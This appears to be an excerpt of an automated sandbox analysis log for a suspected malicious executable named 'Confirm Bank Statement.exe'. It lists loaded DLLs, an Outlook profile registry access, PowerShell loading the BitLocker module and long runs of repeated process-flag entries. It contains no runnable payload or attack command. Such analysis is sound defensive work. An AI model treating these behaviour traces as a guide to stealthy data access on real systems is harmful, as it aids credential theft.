                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Confirm Bank Statement.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Confirm Bank Statement.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_055BD508 push eax; mov dword ptr [esp], ecx0_2_055BD51C
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_055BDFF0 push 08418B05h; ret 0_2_055BE003
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_07274236 push dword ptr [ebp+01h]; ret 0_2_0727423B
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_07286322 push 10418B05h; ret 0_2_07286333
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B52C6A push 00000071h; ret 4_2_00B52C75
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5F273 push ebp; retf 4_2_00B5F281
                    Source: Confirm Bank Statement.exeStatic PE information: section name: .text entropy: 7.627355501282747

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
